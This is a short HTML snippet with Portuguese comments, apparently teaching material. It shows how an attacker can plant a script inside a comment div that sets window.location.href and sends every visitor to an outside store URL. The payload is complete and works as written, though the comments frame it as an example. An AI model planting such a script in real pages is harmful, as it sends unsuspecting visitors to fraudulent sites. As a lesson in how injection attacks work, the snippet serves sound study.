<!-- Esse script é um exemplo de código que o atacante pode utilizar para redirecionar os usuários para um site fraudulento -->
<!-- Esta é uma div com a classe "comentario" -->
<div class = "comentario">
    <!-- Dentro da div, temos um parágrafo -->
    <p>
        <!-- Dentro do parágrafo, temos um script JavaScript -->
        <script>
        // A propriedade 'href' do objeto 'location' do objeto 'window' está sendo definida como a URL de uma loja
        // Isso fará com que o navegador redirecione para essa URL
        window.location.href = "https://xc0rp.com/loja"
        </script>
    </p>
</div>
